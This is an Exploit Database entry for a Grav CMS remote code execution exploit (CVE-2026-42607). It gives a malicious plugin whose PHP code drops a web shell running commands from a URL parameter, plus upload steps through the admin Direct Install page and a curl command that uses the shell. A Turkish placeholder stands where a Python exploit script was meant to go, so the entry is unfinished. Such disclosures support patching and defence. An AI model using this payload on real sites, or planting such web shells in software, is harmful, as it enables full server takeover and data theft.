[webapps] Grav CMS 2.0.0-beta.2 - Remote Code Execution

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Grav CMS 2.0.0-beta.2 - Remote Code Execution EDB-ID: 52578 CVE: 2026-42607 EDB Verified: Author: MUSTAFA MURAT AKGÜL Type: WEBAPPS Exploit:   /   Platform: PHP Date: 2026-05-26 Vulnerable App: # Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE) # Date: 2026-05-08 # Exploit Author: Mustafa Murat Akgül # Vendor Homepage: https://getgrav.org/ # Software Link: https://github.com/getgrav/grav # Version: < 2.0.0-beta.2 # CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw # Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled) Technical Details: The Grav CMS "Direct Install" feature in the Admin plugin allows administrators to upload plugins as ZIP files. The system failed to adequately validate the contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction. By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized), an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory. Proof of Concept (PoC): 1. Create a malicious plugin structure: - shellplugin/blueprints.yaml - shellplugin/shellplugin.yaml - shellplugin/shellplugin.php (Payload below) --- shellplugin.php --- <?php namespace Grav\Plugin; use Grav\Common\Plugin; class ShellpluginPlugin extends Plugin { public static function getSubscribedEvents(): array { return ['onPluginsInitialized' => ['onPluginsInitialized', 0]]; } public function onPluginsInitialized(): void { $shell_path = GRAV_ROOT . '/shell.php'; if (!file_exists($shell_path)) { file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>'); } } } ---------------------- 2. Compress the directory: $ zip -r shellplugin.zip shellplugin/ 3. Log in to the Grav Admin panel and navigate to: /admin/tools/direct-install 4. Upload the 'shellplugin.zip' file. 5. Once installed, the plugin triggers on the next request to the site, dropping a shell at the root. 6. Access your shell: curl "http://<target>/shell.php?cmd=id" Exploit Script (Python): [Buraya yukarıda paylaştığın Python scriptini ekleyebilirsin] Impact: Full system-level access under the context of the web server user. An attacker with administrative privileges (or via CSRF) can compromise the entire server. Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services